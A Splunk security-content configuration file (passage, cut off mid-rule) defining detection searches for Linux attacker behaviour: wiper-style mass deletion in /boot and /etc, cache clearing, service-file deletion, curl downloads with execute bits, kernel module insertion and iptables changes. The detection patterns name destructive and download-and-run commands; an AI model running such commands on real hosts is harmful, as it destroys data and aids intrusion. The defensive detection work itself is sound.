action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a high frequency of file deletion relative to process name and process id /boot/ folder. These events was seen in industroyer2 wiper malware where it tries to delete all files in a critical directory in linux directory. This detection already contains some filter that might cause false positive during our testing. action.notable.param.rule_title = Linux High Frequency Of File Deletion In Boot Folder action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Filesystem.file_name) as deletedFileNames values(Filesystem.file_path) as deletedFilePath dc(Filesystem.file_path) as numOfDelFilePath count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.action=deleted Filesystem.file_path = "/boot/*" by _time span=1h Filesystem.dest Filesystem.process_guid Filesystem.action | `drop_dm_object_name(Filesystem)` | where numOfDelFilePath >= 200 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_high_frequency_of_file_deletion_in_boot_folder_filter` [ESCU - Linux High Frequency Of File Deletion In Etc Folder - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a high frequency of file deletion relative to process name and process id /etc/ folder. These events was seen in acidrain wiper malware where it tries to delete all files in a non-standard directory in linux directory. This detection already contains some filter that might cause false positive during our testing. But we recommend to add more filter if needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a high frequency of file deletion relative to process name and process id /etc/ folder. These events was seen in acidrain wiper malware where it tries to delete all files in a non-standard directory in linux directory. This detection already contains some filter that might cause false positive during our testing. But we recommend to add more filter if needed. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = linux package installer/uninstaller may cause this event. Please update you filter macro to remove false positives. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux High Frequency Of File Deletion In Etc Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AcidRain", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Multiple files delted in /etc/ folder on $dest$ by process GUID - $process_guid$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux High Frequency Of File Deletion In Etc Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["AcidRain", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Filesystem.file_name) as deletedFileNames values(Filesystem.file_path) as deletedFilePath dc(Filesystem.file_path) as numOfDelFilePath count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.action=deleted Filesystem.file_path = "/etc/*" by _time span=1h Filesystem.dest Filesystem.process_guid Filesystem.action | `drop_dm_object_name(Filesystem)` | where numOfDelFilePath >= 200 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_high_frequency_of_file_deletion_in_etc_folder_filter` [ESCU - Linux Impair Defenses Process Kill - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for PKILL process execution for possible termination of process. This technique is being used by several Threat actors, adversaries and red teamers to terminate processes in a targeted linux machine. This Hunting detection can be a good pivot to check a possible defense evasion technique or termination of security application in a linux host or wiper like Awfulshred that corrupt all files. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for PKILL process execution for possible termination of process. This technique is being used by several Threat actors, adversaries and red teamers to terminate processes in a targeted linux machine. This Hunting detection can be a good pivot to check a possible defense evasion technique or termination of security application in a linux host or wiper like Awfulshred that corrupt all files. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = network admin can terminate a process using this linux command. Filter is needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Impair Defenses Process Kill - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Impair Defenses Process Kill - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ( "pgrep", "pkill") Processes.process = "*pkill *" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_impair_defenses_process_kill_filter` [ESCU - Linux Indicator Removal Clear Cache - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for processes that clear or free page cache in Linux system host. This technique was seen in Awfulshred malware wiper that tries to clear the cache using kernel system request drop_caches while wiping all files in the targeted host. This TTP detection can be a good indicator of user or process tries to clear page cache to delete tracks or might be a wiper like Awfulshred. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for processes that clear or free page cache in Linux system host. This technique was seen in Awfulshred malware wiper that tries to clear the cache using kernel system request drop_caches while wiping all files in the targeted host. This TTP detection can be a good indicator of user or process tries to clear page cache to delete tracks or might be a wiper like Awfulshred. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Indicator Removal Clear Cache - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = a $process_name$ clear cache using kernel drop cache system request in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Indicator Removal Clear Cache - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for processes that clear or free page cache in Linux system host. This technique was seen in Awfulshred malware wiper that tries to clear the cache using kernel system request drop_caches while wiping all files in the targeted host. This TTP detection can be a good indicator of user or process tries to clear page cache to delete tracks or might be a wiper like Awfulshred. action.notable.param.rule_title = Linux Indicator Removal Clear Cache action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("dash", "sudo", "bash") AND Processes.process IN("* echo 3 > *", "* echo 2 > *","* echo 1 > *") AND Processes.process = "*/proc/sys/vm/drop_caches" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_indicator_removal_clear_cache_filter` [ESCU - Linux Indicator Removal Service File Deletion - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious linux processes that delete service unit configuration files. This technique was seen in several malware to delete service configuration files to corrupt a services or security product as part of its defense evasion. This TTP detection can be a good indicator of possible malware try to kill several services or a wiper like AwfulShred shell script that wipes the targeted linux host action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.004", "T1070"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious linux processes that delete service unit configuration files. This technique was seen in several malware to delete service configuration files to corrupt a services or security product as part of its defense evasion. This TTP detection can be a good indicator of possible malware try to kill several services or a wiper like AwfulShred shell script that wipes the targeted linux host action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = network admin can delete services unit configuration file as part of normal software installation. Filter is needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Indicator Removal Service File Deletion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = a $process_name$ has a commandline $process$ to delete service configuration file in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Indicator Removal Service File Deletion - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.004", "T1070"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "rm" AND Processes.process = "*rm *" AND Processes.process = "*.service" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_indicator_removal_service_file_deletion_filter` [ESCU - Linux Ingress Tool Transfer Hunting - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic hunts for curl and wget being utilized in the environment. This is meant to help with identifying normal usage and potentially malicious. Utilize this query to tune other curl and wget analytics. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic hunts for curl and wget being utilized in the environment. This is meant to help with identifying normal usage and potentially malicious. Utilize this query to tune other curl and wget analytics. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives will be present. This query is meant to help tune other curl and wget analytics. action.escu.creation_date = 2022-07-29 action.escu.modification_date = 2022-07-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Ingress Tool Transfer Hunting - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land", "Ingress Tool Transfer"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Ingress Tool Transfer Hunting - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land", "Ingress Tool Transfer"], "cis20": ["CIS 10"], "confidence": 10, "impact": 10, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=curl OR Processes.process_name=wget) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_ingress_tool_transfer_hunting_filter` [ESCU - Linux Ingress Tool Transfer with Curl - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies curl with the command-line switches that are commonly used to download, output, a remote script or binary. MetaSploit Framework will combine the -sO switch with | chmod +x to enable a simple one liner to download and set the execute bit to run the file immediately. During triage, review the remote domain and file being downloaded for legitimacy. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies curl with the command-line switches that are commonly used to download, output, a remote script or binary. MetaSploit Framework will combine the -sO switch with | chmod +x to enable a simple one liner to download and set the execute bit to run the file immediately. During triage, review the remote domain and file being downloaded for legitimacy. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives will be present. Tune and then change type to TTP. action.escu.creation_date = 2022-07-29 action.escu.modification_date = 2022-07-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Ingress Tool Transfer with Curl - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land", "Ingress Tool Transfer"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ by user $user$ to download a remote file. Review activity for further details. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 12}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 12}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 12}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Ingress Tool Transfer with Curl - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land", "Ingress Tool Transfer"], "cis20": ["CIS 10"], "confidence": 30, "impact": 40, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where match(process, "(?i)(-O|-sO|-ksO|--output)") | `linux_ingress_tool_transfer_with_curl_filter` [ESCU - Linux Insert Kernel Module Using Insmod Utility - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for inserting of linux kernel module using insmod utility function. This event can detect a installation of rootkit or malicious kernel module to gain elevated privileges to their malicious code and bypassed detections. This Anomaly detection is a good indicator that someone installing kernel module in a linux host either admin or adversaries. filter is needed in this scenario action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.006", "T1547"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for inserting of linux kernel module using insmod utility function. This event can detect a installation of rootkit or malicious kernel module to gain elevated privileges to their malicious code and bypassed detections. This Anomaly detection is a good indicator that someone installing kernel module in a linux host either admin or adversaries. filter is needed in this scenario action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-22 action.escu.modification_date = 2021-12-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Insert Kernel Module Using Insmod Utility - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Rootkit"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ that may install kernel module on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Insert Kernel Module Using Insmod Utility - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Rootkit"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.006", "T1547"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN("kmod", "sudo") AND Processes.process = *insmod* by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_insert_kernel_module_using_insmod_utility_filter` [ESCU - Linux Install Kernel Module Using Modprobe Utility - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for possible installing a linux kernel module using modprobe utility function. This event can detect a installation of rootkit or malicious kernel module to gain elevated privileges to their malicious code and bypassed detections. This Anomaly detection is a good indicator that someone installing kernel module in a linux host either admin or adversaries. filter is needed in this scenario action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.006", "T1547"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for possible installing a linux kernel module using modprobe utility function. This event can detect a installation of rootkit or malicious kernel module to gain elevated privileges to their malicious code and bypassed detections. This Anomaly detection is a good indicator that someone installing kernel module in a linux host either admin or adversaries. filter is needed in this scenario action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-22 action.escu.modification_date = 2021-12-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Install Kernel Module Using Modprobe Utility - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Rootkit"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ that may install kernel module on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Install Kernel Module Using Modprobe Utility - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Rootkit"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.006", "T1547"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN("kmod", "sudo") AND Processes.process = *modprobe* by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_install_kernel_module_using_modprobe_utility_filter` [ESCU - Linux Iptables Firewall Modification - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious commandline that modify the iptables firewall setting of a linux machine. This technique was seen in cyclopsblink malware where it modifies the firewall setting of the compromised machine to allow traffic to its tcp port that will be used to communicate with its C2 server. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious commandline that modify the iptables firewall setting of a linux machine. This technique was seen in cyclopsblink malware where it modifies the firewall setting of the compromised machine to allow traffic to its tcp port that will be used to communicate with its C2 server. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = administrator may do this commandline for auditing and testing purposes. In this scenario filter is needed. action.escu.creation_date = 2023-04-12 action.escu.modification_date = 2023-04-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Iptables Firewall Modification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Sandworm Tools", "Cyclops Blink"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ that may modify iptables firewall on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Iptables Firewall Modification - Rule action.correlationsearch.annotations = {"analytic_story": ["Sandworm Tools", "Cyclops Blink"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*iptables *" AND Processes.process = "* --dport *" AND Processes.process = "* ACCEPT*" AND Processes.process = "*&>/dev/null*" AND Processes.process = "* tcp *" AND NOT(Processes.parent_process_path IN("/bin/*", "/lib/*", "/usr/bin/*", "/sbin/*")) by Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid Processes.dest _time span=10s Processes.user Processes.parent_process_name Processes.parent_process_path Processes.process_path | rex field=Processes.process "--dport (?3269|636|989|994|995|8443)" | stats values(Processes.process) as processes_exec values(port) as ports values(Processes.process_guid) as guids values(Processes.process_id) as pids dc(port) as port_count count by Processes.process_name Processes.parent_process_name Processes.parent_process_id Processes.dest Processes.user Processes.parent_process_path Processes.process_path | where port_count >=3 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_iptables_firewall_modification_filter` [ESCU - Linux Java Spawning Shell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the process name of Java, Apache, or Tomcat spawning a Linux shell. This is potentially indicative of exploitation of the Java application and may be related to current event CVE-2021-44228 (Log4Shell). The shells included in the macro are "sh", "ksh", "zsh", "bash", "dash", "rbash", "fish", "csh', "tcsh', "ion", "eshell". Upon triage, review parallel processes and command-line arguments to determine legitimacy. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the process name of Java, Apache, or Tomcat spawning a Linux shell. This is potentially indicative of exploitation of the Java application and may be related to current event CVE-2021-44228 (Log4Shell). The shells included in the macro are "sh", "ksh", "zsh", "bash", "dash", "rbash", "fish", "csh', "tcsh', "ion", "eshell". Upon triage, review parallel processes and command-line arguments to determine 